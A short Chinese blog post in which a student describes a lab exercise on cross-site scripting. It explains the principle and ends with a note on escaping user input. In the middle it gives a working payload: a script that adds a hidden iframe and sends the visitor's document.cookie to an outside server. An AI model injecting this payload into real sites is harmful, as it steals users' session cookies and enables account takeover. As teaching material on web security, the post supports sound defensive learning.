今天没啥实际内容,刚做了信息安全的第一个实验,关于XSS跨站攻击的,觉得这个东西还是蛮有用的(切勿做不好的事啊哈哈哈哈),就分享出来。

1.原理分析

XSS(Cross Site Scripting),即跨站脚本攻击,是一种常见于web application中的计算机安全漏洞。XSS通过在用户端注入恶意的可运行脚本,若服务器端对用户输入不进行处理,直接将用户输入输出到浏览器,则浏览器将会执行用户注入的脚本。说白了就是用户输入到了网页上面,然后浏览器识别为正常的代码了,将其执行了,而此时你可以注入任何js代码,包括获取用户cookie信息并转发至指定服务器。

2.实例再现

代码很短:

<script>
    document.write("<iframe width=0 height=0 src='http://10.1.1.78/cookie.asp?cookie="+document.cookie+"'></iframe>");
</script>

简要说一下就是在加载网页的时候,浏览器会加载iframe里面的恶意网页,而里面的10.1.1.78是我的本地服务器,当用户访问我的网站的时候会顺带访问上述站点,就将他的cookie写入了我的服务器上写好的代码里,就实现了窃取的功能

3.防范措施

防范起来也很简单,只要在所有的用户输入的地方将可能的恶意代码比如html里面的特殊符号进行转义,就不会有问题啦 icon_idea.png